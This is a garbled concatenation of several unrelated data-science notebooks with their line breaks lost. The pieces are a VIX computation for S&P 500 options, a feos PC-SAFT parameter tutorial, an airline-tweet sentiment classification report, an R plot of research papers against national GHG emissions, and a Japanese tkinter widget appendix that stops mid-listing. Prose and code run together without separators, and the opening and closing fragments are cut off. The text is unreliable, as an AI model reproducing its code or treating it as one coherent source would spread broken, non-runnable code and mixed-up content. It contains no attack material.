against CBOE VIX for S&P 500 optionsfrom vxbt_calc import vxbt_calc as vc from datetime import timedeltaCBOE's VIX takes options expiring between 23 and 37 days from now as near-term and next-term options (see CBOE VIX White Paper). Assume exact time of expiry can be neglected for now.now = datetime.now().date() start_date = now + timedelta(days=23) end_date = now + timedelta(days=37) fridays = [day for row in calendar.Calendar(firstweekday=calendar.MONDAY).yeardatescalendar(now.year) for month in row for week in month for day in week if day.weekday() == calendar.FRIDAY] near_exp, next_exp = [friday for friday in fridays if friday > start_date and friday < end_date] near_exp, next_expManually download data CSVs from https://www.barchart.com/stocks/quotes/$SPX/options to processnear_data = pd.read_csv('$spx-options-exp-2020-05-22-show-all-stacked-04-27-2020.csv', skipfooter=1) next_data = pd.read_csv('$spx-options-exp-2020-05-29-show-all-stacked-04-27-2020.csv', skipfooter=1) near_data near_calls_df = near_data[near_data['Type'] == 'Call'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) near_puts_df = near_data[near_data['Type'] == 'Put'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) next_calls_df = next_data[next_data['Type'] == 'Call'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) next_puts_df = next_data[next_data['Type'] == 'Put'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) near_calls_dfSet maturity to 30 days as specified in VIX White Paper and arbitrarily use value of R1 from the paper as the yield rate (effect is negligible).maturity = 30 rate = 0.000305 VIX, _1, _2 = vc.calculate_indices(now, 
near_exp, next_exp, maturity, rate, near_calls_df, near_puts_df, next_calls_df, next_puts_df) VIXGet the value of VIX from Yahoo Finance at the time options data was downloaded:import yfinance as yf yf_vix = yf.Ticker('^VIX') yf_vix.history(period='5d').at['2020-04-27', 'Close']Value matches. Not an exact match but this is expected as US Treasury yield rates and exact expiry times are neglected in our calculation.sp = yf.Ticker('^SPX') sp.option_chain('2020-04-29').callsModule Name Introduction to the Module Main Concept Tutorial About the Datasets Libraries used and references Learning Objectives Checklist Resources Contact for HelpWorking with parameters Goal- Read in parameters for pure substances and mixtures from json files, and- create parameters for pure substances and mixtures within Python.- For both regular parameters as well as via the homo-segmented group contribution method.- Learn how to access information stored in parameter objects. Parameters and the equation of stateBefore we can start to compute physical properties, two steps are needed:1. Build a parameter object.2. Instatiate the equation of state using the parameter object.In principle, every implementation of an equation of state can manage parameters differently but typically the workflow is similar for each implementation.For `pcsaft` we first generate the parameters object, `PcSaftParameters`, which we then use to generate the equation of state object, `PcSaft`.The `PcSaftParameters` object is part of the `feos.pcsaft` module while `PcSaft` is part of the `feos.pcsaft.eos` module.from feos.pcsaft import PcSaftParameters--- Read parameters from json file(s)The easiest way to create the `PcSaftParameters` object is to read information from one or more json files.- To read information from a single file, use `PcSaftParameters.from_json`- To read information from multiple files, use `PcSaftParameters.from_multiple_json` From a single file Pure substanceQuerying a substance from a file requires an *identifier*.This identifier can be one of `Name`, `Cas`, `Inchi`, `IupacName`, `Formula`, or `Smiles` with `Name` (common english name) being the default.We can change the identifier type usig the `search_option` argument. Given a list of identifiers and a path to the parameter file, we can conveniently generate our object.# path to parameter file for substances that are non-associating, i.e. defined by three parameters: m, sigma, and epsilon_k. file_na = '../parameters/pcsaft/gross2001.json' # a system containing a single substance, "methane", using "Name" as identifier (default) parameters = PcSaftParameters.from_json(['methane'], pure_path=file_na) parameters # a system containing a single substance, "methane", using "Smiles" ("C") as identifier parameters = PcSaftParameters.from_json(['C'], pure_path=file_na, search_option="Smiles") parametersMixturesReading parameters for more than one substance from a single file is very straight forward: simply add more identifiers to the list.Note that the **order** in which which identifiers are provided **is important**. When computing vector valued properties, **the order of the physical properties matches the order of the substances within the parameter object**.# a system containing a ternary mixture parameters = PcSaftParameters.from_json(['methane', 'hexane', 'dodecane'], pure_path=file_na) parametersFrom multiple filesThere may be cases where we have to split our parameter information across different files. 
For example, the `feos` repository has parameters stored in different files where each file corresponds to the parameter's original publication. Constructing the parameter object using multiple different json files is a bit more complicated. We can provide a list tuples, each of which contains the list of substances and the file where parameters are stored.In the example below, we define a 4 component mixture from three input files:- methane is read from a file containing non-associating substance parameters.- parameters for 1-butanol and water are read from a file containing associating substances, and- acetone parameters are read from a file that contains substances modelled with dipolar interactions.# na = non-associating # assoc = associating file_na = '../parameters/pcsaft/gross2001.json' file_assoc = '../parameters/pcsaft/gross2002.json' file_dipolar = '../parameters/pcsaft/gross2006.json' parameters = PcSaftParameters.from_multiple_json( [ (['C'], file_na), (['CCCCO', 'O'], file_assoc), (['CC(C)=O'], file_dipolar) ], search_option='Smiles' ) parametersWith binary interaction parametersSome mixtures cannot be adequately described with combination rules from pure substance parameters.In PC-SAFT, we can use a binary interaction parameter, `k_ij`, to enhance the description of mixture behavior.These interaction parameters can be supplied from a json file via the `binary_path` option.This parameter is not shown in the default representation of the parameter object. You can access the matrix of `k_ij` via the getter, `PcSaftParameters.k_ij`.file_na = '../parameters/pcsaft/gross2001.json' file_assoc = '../parameters/pcsaft/gross2002.json' file_binary = '../parameters/pcsaft/gross2002_binary.json' parameters = PcSaftParameters.from_multiple_json( [ (['CCCC'], file_na), (['CCCCO',], file_assoc) ], binary_path=file_binary, search_option='Smiles' ) parameters parameters.k_ij--- Building parameters in PythonBuilding `PcSaftParameters` in Python is a bit more involved since the `PcSaftParameters` object is built from multiple intermediate objects.Let's import these objects, i.e.- the `Identifier` object that stores information about how a substance can be identified,- the `PcSaftRecord` object that stores our SAFT parameters,- and the `PureRecord` object that bundles identifier and parameters together with the molar weight.All these objects are imported from the `feos.pcsaft` module.from feos.pcsaft import Identifier, PcSaftRecord, PureRecordFor the `Identifier`, only `cas` is mandatory. If you quickly want to build a system, this value does not have to be sensible (i.e. you could simply use `'1'`).identifier = Identifier( cas='106-97-8', name='butane', iupac_name='butane', smiles='CCCC', inchi='InChI=1/C4H10/c1-3-4-2/h3-4H2,1-2H3', formula='C4H10' ) identifierThe `PcSaftRecord` contains the model parameters for a pure substance. 
*Mandatory* parameters are- the number of segments, `m`, which is a dimensionless floating point number,- the Lennard-Jones structure parameter (diameter), `sigma`, in units of Angstrom, and- the Lennard-Jones energy parameter, `epsilon_k`, in units of Kelvin.*Optional* parameters are- the dipole moment, `mu`, in units of Debye used to model dipolar substances,- the quadrupole moment, `q`, in units of Debye used to model quadrupolar substances,- parameters to model association: - `kappa_ab`, `epsilon_k_ab`, `na`, `nb`- and parameters for entropy scaling: - `viscosity`, `diffusion`, and `thermal_conductivity` - each of which is a list containing coefficients for the respective correlation functions.# parameters for a non-associating, non-polar substance (butane) psr = PcSaftRecord(m=2.3316, sigma=3.7086, epsilon_k=222.88) psrA `PureRecord` is built from an `Identifier`, the molar weight (in gram per mole) and a `PcSaftRecord`. Optionally, but not shown in this example, we can provide an `ideal_gas_record` depending on the ideal gas model used in the equation of state. We will not discuss this contribution here but address the topic in a different example.butane = PureRecord(identifier, molarweight=58.123, model_record=psr) butane`PcSaftParameters` for a single component For a single substance, we can use the `PcSaftParameters.new_pure` constructor.parameters = PcSaftParameters.new_pure(butane) parameters`PcSaftParameters` for binary mixturesWe can create another `PureRecord` for a second component. Then, the `PcSaftParameters.new_binary` constructor let's us build the parameters. Optionally, we can also directly provide a `k_ij` value for this system.butan_1_ol = PureRecord( identifier=Identifier( cas='71-36-3', name='1-butanol', iupac_name='butan-1-ol', smiles='CCCCO', inchi='InChI=1/C4H10O/c1-2-3-4-5/h5H,2-4H2,1H3', formula='C4H10O' ), molarweight=74.123, model_record=PcSaftRecord(m=2.7515, sigma=3.6139, epsilon_k=259.59, kappa_ab=0.006692, epsilon_k_ab=2544.6) ) parameters = PcSaftParameters.new_binary([butane, butan_1_ol], binary_record=0.015) parameters parameters.k_ij`PcSaftParameters` for mixtures with more than two componentsFor mixtures with more than two components, we can use the `PcSaftParameters.from_records` constructor which takes a list of `PureRecords` and a `numpy.ndarray` containing the matrix of `k_ij` values.import numpy as np k_ij = np.zeros((2, 2)) k_ij[0, 1] = k_ij[1, 0] = 0.015 parameters = PcSaftParameters.from_records([butane, butan_1_ol], binary_records=k_ij) parameters parameters.k_ij--- Parameters from homo-segmented group contribution (homo-GC)An alternative to substance specific parameters are parameters that combine information from functional groups (molecule *segments*).A simple variant that only uses the *number of segments* (*not* how these segments are connected to form the molecule) is the so-called homo-segmented group contribution method (homo-GC).As with regular SAFT parameters, we can build a `PcSaftParameters` object from json or from Python - using segment information. 
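To make the idea concrete, here is an illustrative sketch of how homo-GC assembles pure-component parameters from segment counts (the exact combining rules are defined in the referenced parameter publication, e.g. the Sauer 2014 segment set used below, so treat this only as the general pattern): with $n_{i\alpha}$ segments of type $\alpha$ in molecule $i$,

$$m_i = \sum_\alpha n_{i\alpha}\, m_\alpha, \qquad \sigma_i^{3} = \frac{\sum_\alpha n_{i\alpha}\, m_\alpha\, \sigma_\alpha^{3}}{\sum_\alpha n_{i\alpha}\, m_\alpha}, \qquad \varepsilon_i = \frac{\sum_\alpha n_{i\alpha}\, m_\alpha\, \varepsilon_\alpha}{\sum_\alpha n_{i\alpha}\, m_\alpha}.$$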
From json filesWe need at least two files: - `pure_path`: a file containing the substance identifiers *and* the segments that form the molecule- `segments_path`: a file that contains the segments (identifier and model parameters)As before, we can specify our substance identifier using `search_option` and we can provide binary interaction parameters (segment-segment `k_ij`) via the `binary_path` argument.pure_path = '../parameters/pcsaft/gc_substances.json' segments_path = '../parameters/pcsaft/sauer2014_homo.json' parameters = PcSaftParameters.from_json_segments(['CCCC', 'CCCCO'], pure_path, segments_path, search_option='Smiles') parametersFrom PythonBuilding parameters in Python follows a similar approach as for regular parameters. To build `PcSaftParameters` from segments, we need to specify:- The `ChemicalRecord` which contains the `Identifier` and the segments (as list of `str`s),- and the `SegmentRecord` which specifies the identifier of the segment (has to be the same as in the list of the `ChemicalRecord`), the molar weight and the `PcSaftRecord` for the segment.If both are available, we can use the `PcSaftParameters.from_segments` constructor to build the parameters.from feos.pcsaft import ChemicalRecord, SegmentRecord cr1 = ChemicalRecord( identifier=Identifier( cas='106-97-8', name='butane', iupac_name='butane', smiles='CCCC', inchi='InChI=1/C4H10/c1-3-4-2/h3-4H2,1-2H3', formula='C4H10' ), segments=['CH3', 'CH2', 'CH2', 'CH3'] ) cr2 = ChemicalRecord( identifier=Identifier( cas='71-36-3', name='1-butanol', iupac_name='butan-1-ol', smiles='CCCCO', inchi='InChI=1/C4H10O/c1-2-3-4-5/h5H,2-4H2,1H3', formula='C4H10O' ), segments=['CH3', 'CH2', 'CH2', 'CH2', 'OH'] )Each segment has a `PcSaftRecord` which can be constructed just like we did before for a substance.ch3 = SegmentRecord('CH3', molarweight=15.0345, model_record=PcSaftRecord(m=0.61198, sigma=3.7202, epsilon_k=229.90)) ch2 = SegmentRecord('CH2', molarweight=14.02658, model_record=PcSaftRecord(m=0.45606, sigma=3.8900, epsilon_k=239.01)) oh = SegmentRecord('OH', molarweight=17.00734, model_record=PcSaftRecord(m=0.40200, sigma=3.2859, epsilon_k=488.66, epsilon_k_ab=2517.0, kappa_ab=0.006825)) parameters = PcSaftParameters.from_segments(chemical_records=[cr1, cr2], segment_records=[ch3, ch2, oh]) parametersAccessing information from parameter objectsOnce the `PcSaftParameter` object is constructed, within a jupyter notebook, we get a nice representation in form of a markdown table.Sometimes, however you might want to access information not presented in this table or you might want to store information in a variable.Let's build parameters for the four-component mixture we looked at earlier:file_na = '../parameters/pcsaft/gross2001.json' file_assoc = '../parameters/pcsaft/gross2002.json' file_dipolar = '../parameters/pcsaft/gross2006.json' parameters = PcSaftParameters.from_multiple_json( [ (['C'], file_na), (['CCCCO', 'O'], file_assoc), (['CC(C)=O'], file_dipolar) ], search_option='Smiles' ) parametersAs we've seen before, we can directly access the binary interaction parameter, `k_ij`, which is zero here for all binary interactions (we did not provide a file).parameters.k_ijGet `PureRecord`s via `parameters.pure_records`We have seen above that it is possible to generate parameters in Python using intermediate objects, such as `Identifier`, `PcSaftRecord` and `PureRecord`.You can generate these objects for all substances via the `pure_records` method (getter).This getter returns `PureRecord` objects which can be further deconstructed 
to yield the `Identifier` and `PcSaftRecord` objects and the molar weight.Note that the order in which substances are returned matches the order in which we specified the substances above.parameters.pure_records for pure_record in parameters.pure_records: print(f"σ ({pure_record.identifier.name})\t = {pure_record.model_record.sigma} A") # get identifier of substance 0 parameters.pure_records[0].identifier # get molarweight of substance 0 parameters.pure_records[0].molarweightA `PureRecord` object can be used to generate a json string which then can conveniently be stored in a file.# generate a json string from identifier of substance 0 parameters.pure_records[0].to_json_str()CIS434 Social MediaFinal Project ReportFangyuan (Milar) Liu31637503 IntroductionThe dataset provided for this project is the tweets sent by a customer to an airline, extracted from twitter. Most of the tweets are negative. The goal of this project is to identify those tweets that are NOT negative. In order to achieve the goal, the following steps are conducted, including .Throughout all the steps, the output will be generated as:* a CSV file of non-negative tweets consisting of three columns:* * column 1: id from the original table corresponding to the tweet* * column 2: the evaluation of whether the classification is correct (1 being correct, 0 being wrong)* * column 3: contents of the identified non-negative tweets 1. Data cleaning and visualization 1.1 Import the packages for further steps# packages for data handling import re import pandas as pd import numpy as np # packages for visualization import matplotlib.pyplot as plt %matplotlib inline import seaborn as sns # packages for pre-processing and text handling import string import nltk from nltk.stem.porter import * from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.model_selection import train_test_split from sklearn.model_selection import GridSearchCV from sklearn.metrics import f1_score # packages for model building from sklearn.naive_bayes import MultinomialNB from sklearn.svm import SVC from sklearn.ensemble import BaggingClassifier from sklearn import tree from sklearn.tree import DecisionTreeClassifier from sklearn.linear_model import LogisticRegression from sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier # packages for ignoring unnecessary warnings import warnings warnings.simplefilter(action='ignore', category=FutureWarning) warnings.filterwarnings(action='ignore', category=DeprecationWarning) pd.set_option('mode.chained_assignment', None)1.2 Load the training and testing datasetLoad the training dataset and label the noncomplaint tweets as 1, and the complaint ones as 0, combine them together. Also load the test dataset and label the tweets as NaN for further processing. There are 1700 obs of non-negative training data and 1700 obs of negative training data. The testing data includes 4555 unlabeled obs.train_pos = pd.read_csv('noncomplaint1700.csv') train_pos['label'] = 1 train_neg = pd.read_csv('complaint1700.csv') train_neg['label'] = 0 train = pd.concat([train_pos, train_neg]) test = pd.read_csv('temp.csv')[['id', 'airline', 'tweet']] test['label'] = np.nan1.3 Clean the datasetsFirstly, combine the training and testing dataset for pre-processing together. Then, define the function remove_pattern( ) to remove the "@user", which is unnecessary for the analysis. Also, remove the numbers and special characters, which are also unnecessary. Secondly, tokenize all the tweets in the combined dataset. 
Thirdly, stem the tweet content. For instance, the words "playing, player, played" will all be regarded as the root word "play".combi = train.append(test, ignore_index=True) def remove_pattern(input_txt, pattern): r = re.findall(pattern, input_txt) for i in r: input_txt = re.sub(i, '', input_txt) return input_txt combi['tidy_tweet'] = np.vectorize(remove_pattern)(combi['tweet'], "@[\w]*") combi['tidy_tweet'] = combi['tidy_tweet'].str.replace("[^a-zA-Z#]", " ") tokenized_tweet = combi['tidy_tweet'].apply(lambda x: x.split()) tokenized_tweet.head() stemmer = PorterStemmer() tokenized_tweet = tokenized_tweet.apply(lambda x: [stemmer.stem(i) for i in x]) # stemming tokenized_tweet.head() for i in range(len(tokenized_tweet)): tokenized_tweet[i] = ' '.join(tokenized_tweet[i]) combi['tidy_tweet'] = tokenized_tweet1.4 Learn about the keywordsUse wordcloud to plot the frequently used words and learn about the tweet content. As we can see, the keywords include: flight, plane, delay, airline, time, cancel, customerservice, etc. The wordcloud gives a general idea of the users' sentiment distribution in the datasets.all_words = ' '.join([text for text in combi['tidy_tweet']]) from wordcloud import WordCloud wordcloud = WordCloud(width=800, height=500, random_state=21, max_font_size=110).generate(all_words) plt.figure(figsize=(10, 7)) plt.imshow(wordcloud, interpolation="bilinear") plt.axis('off') plt.show()2. Feature extraction 2.1 Use bag-of-words (BoW) for featuring# bag-of-words from sklearn.feature_extraction.text import CountVectorizer bow_vectorizer = CountVectorizer(max_df=0.90, min_df=2, max_features=1000, stop_words='english') bow = bow_vectorizer.fit_transform(combi['tidy_tweet'])2.2 Use TF-IDF for featuring# tfidf tfidf_vectorizer = TfidfVectorizer(max_df=0.90, min_df=2, max_features=1000, stop_words='english') tfidf = tfidf_vectorizer.fit_transform(combi['tidy_tweet'])2.3 Split the featured data into training and testing datasetsAs mentioned, there are 3400 obs in the training dataset (1700 non-negative obs and 1700 negative obs), and 4555 obs in the testing dataset. In addition, build a dataframe called "res" to store the results of the models.train_bow = bow[:3400,:] test_bow = bow[3400:,:] X_train=tfidf[0:3400,:] y_train=combi['label'].loc[0:3399] X_test=tfidf[3400:,:] res = combi.loc[3400:,] res3. Model buildingTo classify the testing tweets into non-negative ones and negative ones, build 6 different models, which are:* Naive Bayes (NB)* Support vector machine (SVM)* * polynomial kernel* * rbf kernel* Bagging* Boosting* Logistic regression* Random forestSpecifically, for the models that require parameter tuning (SVM, LR, RF), use GridSearchCV to find the best parameters and best estimators for the model. Since it can be quite arbitrary to directly classify the obs as non-negative (1) or negative (0), it is better to check the probability that each prediction is 1 or 0, inspect the probabilities, and then set an appropriate threshold to tune the predictions accordingly.For each model, a list is created to store the predictions generated by this model. 3.1 Naive Bayes (NB)Having used .predict_proba( ) to check the probability of classification, the output shows that most of the probabilities cluster around 0.33. Hence, it is better to set the threshold to 0.33 rather than the default value of 0.5.
By setting the threshold as 0.33, if the probability to label 0 is greater than 0.33, the obs will be classified as negative, otherwise it will be classified as non-negative.NB = MultinomialNB().fit(X_train, y_train) NB_neg = NB.predict_proba(X_test)[:,0] NB_pred = [] for i in range(0, len(NB_neg)): if NB_neg[i] > 0.33: NB_pred.append(0) else: NB_pred.append(1) res['NB_pred'] = NB_pred3.2 Support vector machine (SVM)For SVM models using polynomial and rbf kernel, use GridSearchCV to find out the best parameters and best estimators. As same logic mentioned above, the threshold of SVM model is set as 0.4 to make the classification more effective.# kernel=poly SVM_poly = SVC(kernel='poly', probability=True) param_grid = {'C': [0.1,1,10,100], 'gamma': [0.01,0.1,1],'degree': [2,3,5]} grid_search = GridSearchCV(SVM_poly, param_grid, cv=5) grid_search.fit(X_train, y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) SVM_poly_neg = grid_search.predict_proba(X_test)[:,0] SVM_poly_pred = [] for i in range(0, len(SVM_poly_neg)): if SVM_poly_neg[i] > 0.4: SVM_poly_pred.append(0) else: SVM_poly_pred.append(1) res['SVM(poly) pred'] = SVM_poly_pred # kernel-rbf SVM_rbf = SVC(kernel='rbf', probability=True) param_grid = {'C': [0.1,1,10,100], 'gamma': [0.01,0.1,1],'degree': [2,3,5]} grid_search = GridSearchCV(SVM_rbf, param_grid, cv=5) grid_search.fit(X_train, y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) SVM_rbf_neg = grid_search.predict_proba(X_test)[:,0] SVM_rbf_pred = [] for i in range(0, len(SVM_rbf_neg)): if SVM_rbf_neg[i] > 0.4: SVM_rbf_pred.append(0) else: SVM_rbf_pred.append(1) res['SVM(rbf) pred'] = SVM_rbf_pred3.3 BaggingFor bagging model, as same logic mentioned above, the threshold of bagging model is set as 0.4 to make the classification more effective.dtc = DecisionTreeClassifier(criterion="entropy") bagging = BaggingClassifier(base_estimator=dtc, n_estimators=100, bootstrap=True) bagging = bagging.fit(X_train,y_train) bagging_neg = bagging.predict_proba(X_test)[:,0] bagging_pred = [] for i in range(0, len(bagging_neg)): if bagging_neg[i] > 0.4: bagging_pred.append(0) else: bagging_pred.append(1) res['Bagging pred'] = bagging_pred3.4 BoostingFor boosting model, as same logic mentioned above, the threshold of boosting model is set as 0.495 to make the classification more effective.boosting = AdaBoostClassifier(n_estimators=100, learning_rate=1) boosting = boosting.fit(X_train, y_train) boosting_neg = boosting.predict_proba(X_test)[:,0] boosting_pred = [] for i in range(0, len(boosting_neg)): if boosting_neg[i] > 0.495: boosting_pred.append(0) else: boosting_pred.append(1) res['Boosting pred'] = boosting_pred3.5 Logistic regression (LR)For LR model, use GridSearchCV to find out the best parameters and best estimators. As same logic mentioned above, the threshold of LR model is set as 0.4 to make the classification more effective.LR = LogisticRegression(random_state=1) param_grid = {"C":np.logspace(-3,3,7), "penalty":["l1","l2"]} grid_search = GridSearchCV(LR, param_grid,cv=5) grid_search.fit(X_train,y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) LR_neg = grid_search.predict_proba(X_test)[:,0] LR_pred = [] for i in range(0, len(LR_neg)): if LR_neg[i] > 0.4: LR_pred.append(0) else: LR_pred.append(1) res['LR pred'] = LR_pred3.6 Random forest (RF)For RF model, use GridSearchCV to find out the best parameters and best estimators. 
As same logic mentioned above, the threshold of RF model is set as 0.41 to make the classification more effective.RF = RandomForestClassifier() param_grid = {'n_estimators': [50,100,500,1000], 'max_features': [5,15,25],'max_depth':[5,10,20,50]} grid_search = GridSearchCV(RF, param_grid,cv=5) grid_search.fit(X_train,y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) RF_neg = grid_search.predict_proba(X_test)[:,0] RF_pred = [] for i in range(0, len(RF_neg)): if RF_neg[i] > 0.411: RF_pred.append(0) else: RF_pred.append(1) res['RF pred'] = RF_pred4. Model results and selectionTo display the results of the above models, create a dataframe with the first column showing the names of models, the second column showing the predicted number of non-negative tweets.models_res = pd.DataFrame() models_res['Model name'] = ['NB', 'SVM(poly)', 'SVM(rbf)', 'Bagging', 'Boosting', 'LR', 'RF'] models_res['# of non-negative tweets'] = [sum(NB_pred), sum(SVM_poly_pred), sum(SVM_rbf_pred), sum(bagging_pred), sum(boosting_pred), sum(LR_pred), sum(RF_pred)] models_resAs can be seen in the above chart, the number of non-negative tweets predicted by NB, boosting model, and RF make more sense than the others, given that the project information says most of the obs are negative. To look into details and compare these three models, extract their results as a CSV file named "models_comparison.csv", and screen the non-negative tweets predicted by each model using manual judgement.models_comparison = test models_comparison['Boosting_pred'] = boosting_pred models_comparison['RF_pred'] = RF_pred models_comparison['NB_pred'] = NB_pred models_comparison models_comparison.to_csv(r'models_comparison.csv')After comparing the three models, the RF model tends to predict more accurately. Select RF as the model to use.Details will be provided in the following part. 5. Output generation 5.1 Screen the predictions of RF modelUse the CSV file extracted above, for the non-negative tweets predicted by each models, screen the tweets with manual judgement by putting myself in the shoes of the tweeting customer. Calculate the precisions for each model's classification, and the highest one is from RF model.Create a dataframe to display the results. The column "evaluation" representing the evaluation of whether the classification is correct: 1 being correct, 0 being wrong. It is from the comparison of manual judgement and RF predictions.df_output = pd.read_csv('RF_pred_pos.csv') df_output = df_output[df_output['RF_pred']==1].iloc[:,1:] df_output['label'] = df_output['label'].astype(int) df_output5.2 Generate the output CSV fileCreate the final output dataframe with the required three columns and extract it as the required CSV file.output = df_output[['id', 'label', 'tweet']] output.reset_index(inplace=True) output.drop(columns = ['index'], inplace=True) output.columns = ['id', 'evaluation', 'non-negative tweets'] output output.to_csv(r'fangyuan_liu.csv', index=False)5.3 Calculate the precision of classificationAccording to the definition, precision is calculated by first summing up the second column "evaluation" and then dividing the sum by the total number of rows, which is exactly the mean of second column "evaluation". 
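In symbols, with $e_i \in \{0,1\}$ the manual evaluation of the $i$-th identified tweet and $N$ the number of identified non-negative tweets:

$$\text{precision} = \frac{1}{N}\sum_{i=1}^{N} e_i = \operatorname{mean}(e).$$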
Calculatioin shows that, the precision of classification is around:__0.74__.Precision = output.mean()['evaluation'] print('The precision of classification is:', round(Precision, 2))The precision of classification is: 0.74Database with one row for each publication-country associationpath <- "../5_Final_databases/output/database_multi_rows_each_paper_one_per_country.csv" df <- read_csv(path) sprintf("%i x %i dataframe", nrow(df), ncol(df))Parsed with column specification: cols( .default = col_double(), Country = col_character(), title = col_character(), ISO_3 = col_character(), Region = col_character(), authors = col_character(), source = col_character(), doi = col_character(), abstract = col_character(), author_keywords = col_character(), model = col_character(), scopus_number = col_character(), WOS_number = col_character() ) See spec(...) for full column specifications.Importing CAIT DatabaseBased on https://www.climatewatchdata.org/data-explorer/historical-emissions?historical-emissions-data-sources=cait&historical-emissions-gases=all-ghg&historical-emissions-regions=All%20Selected&historical-emissions-sectors=total-including-lucf&page=1path_CAIT <- "../0_Reference_files/CAIT_GHG_2016.csv" df_CAIT <- read_csv(path_CAIT) sprintf("%i x %i dataframe", nrow(df_CAIT), ncol(df_CAIT)) head(df_CAIT,1)Parsed with column specification: cols( ISO_3 = col_character(), Country = col_character(), `Data source` = col_character(), Sector = col_character(), Gas = col_character(), Unit = col_character(), GHG_incl_landuse = col_double() )Count publications and GHG emissions associated to each ISO3 and respectively the relative proportion of the databaseoptions(scipen=10000) data <- df %>% select(ISO_3,Region)%>% group_by(ISO_3,Region)%>% summarise(count_papers = n())%>% ungroup()%>% inner_join(df_CAIT, by ='ISO_3')%>% mutate(ratio_papers = round(count_papers /4691,digit=4), ratio_GHG_incl_landuse = round(GHG_incl_landuse / sum(GHG_incl_landuse), digit=4)) head(data,2) sprintf("%i x %i dataframe", nrow(data), ncol(data))Plotoptions(repr.plot.width=12, repr.plot.height=12) plot <- ggplot(data%>% filter(count_papers>10), aes(x=ratio_GHG_incl_landuse, y=ratio_papers, size =count_papers, color = Region, label = Country)) + geom_point(alpha=2) + scale_size(range = c(0.01, 15), breaks=c(10,20,50,100,300,500,1000), name="Number of papers") + scale_fill_manual(values=c('Asia'='darkorange', 'European Union'='#7CAE00', 'Europe'='seagreen4', 'North America'='darkblue', 'Latin America'='dodgerblue2', 'Africa'='orchid', 'Oceania'='#CD9600', 'Antarctica'='#CAB2D6'))+ theme_ipsum() + geom_text_repel( data = subset(data, count_papers>20 & ratio_GHG_incl_landuse > ratio_papers), nudge_x = 0.2 - log10(subset(data, count_papers>20 & ratio_GHG_incl_landuse > ratio_papers)$ratio_GHG_incl_landuse), segment.size = 0.2, segment.color = "grey50", direction = "y", hjust = 0, size=5 ) + geom_text_repel( data = subset(data, count_papers> 20 & ratio_GHG_incl_landuse < ratio_papers), nudge_x = log10(subset(data, count_papers>20 & ratio_GHG_incl_landuse < ratio_papers)$ratio_GHG_incl_landuse), direction = "y", segment.size = 0.2, segment.color = "grey50", hjust = 1, size=5 ) + scale_x_continuous(name="\n Country share in World GHG emissions", limits = c(NA, 0.50), trans='log10') + scale_y_continuous(name="Country share of papers \n",limits=c(NA, 0.30),trans ='log10') + geom_abline(intercept = 0, slope = 1) + theme(legend.title = element_text(size = 16,face ="bold"), legend.text = element_text(size = 16), legend.position="right", 
axis.text.x = element_text(size = 16), axis.text.y = element_text(size = 16), axis.title.x = element_text(size = 16, hjust = 0.5,face ="bold"), axis.title.y = element_text(size = 16, hjust = 0.5,face ="bold") )+ guides(color = guide_legend(override.aes = list(shape = 19, size=5))) plot ggsave('./output/Fig2_comparison_papers_emissions.png', height=12, width=12, plot=plot)Chapter6: 付録 6.1 ウイジットの使用例 6.1.1 ウインドウオプション# リスト6.1.1: ウインドウのオプション import tkinter as tk root = tk.Tk() root.geometry("300x100") # ウインドウ名 root.title("TestApp") # アイコン root.iconphoto(True, tk.PhotoImage(file = "Images/icon.png")) # ウインドウサイズの固定 root.resizable(width = False, height = False) root.mainloop()※ リスト6.1.1のウインドウオプションをリセットしたい場合は、カーネルをリスタートしてください。 6.1.2 メニューバーの階層追加# リスト6.1.2: メニューバーに第2階層の追加 import tkinter as tk root = tk.Tk() root.geometry("300x100") # メニューバーの作成 menubar = tk.Menu(root) root.configure(menu = menubar) # Fileメニュー filemenu = tk.Menu(menubar, tearoff = 0) menubar.add_cascade(label = "File", menu = filemenu) # >Open... open_menu = tk.Menu(menubar, tearoff = 0) filemenu.add_cascade(label = "Open...", menu = open_menu) open_menu.add_command(label = "txt File (*.txt)") open_menu.add_command(label = "asc File (*.asc)") # >Exit filemenu.add_command(label = "Exit") root.mainloop()6.1.3 その他のメッセージボックス# リスト6.1.3: showinfo import tkinter as tk from tkinter import messagebox root = tk.Tk() # ウインドウの非表示 root.withdraw() # showinfo mb = messagebox.showinfo("title", "message") print(mb) # リスト6.1.4: showwarning import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # showwarning mb = messagebox.showwarning("title", "message") print(mb) # リスト6.1.5: askquestion import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askquestion mb = messagebox.askquestion("title", "message") print(mb) # リスト6.1.6: askyesno import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askyesno mb = messagebox.askyesno("title", "message") print(mb) # リスト6.1.7: askokcancel import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askokcancel mb = messagebox.askokcancel("title", "message") print(mb) # リスト6.1.8: askretrycancel import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askretrycancel mb = messagebox.askretrycancel("title", "message") print(mb)True6.1.4 シンプルダイアログ# リスト6.1.8: simpledialog import tkinter as tk # simpledialogのインポート import tkinter.simpledialog as simpledialog root = tk.Tk() root.withdraw() # simpledialog data = simpledialog.askstring("title", "message") print(data)6.1.5 スピンボックス、チェックボタン ※) 他のセルでroot.withdraw()を実行している場合は、カーネルをリスタートしてください。# リスト6.1.9: スピンボックスとチェックボタン import tkinter as tk from tkinter import ttk root = tk.Tk() # スピンボックス spinbox = tk.StringVar() spinbox.set(0) sp = ttk.Spinbox(root, textvariable = spinbox, from_=-5, to=5, width = 10) sp.pack() # 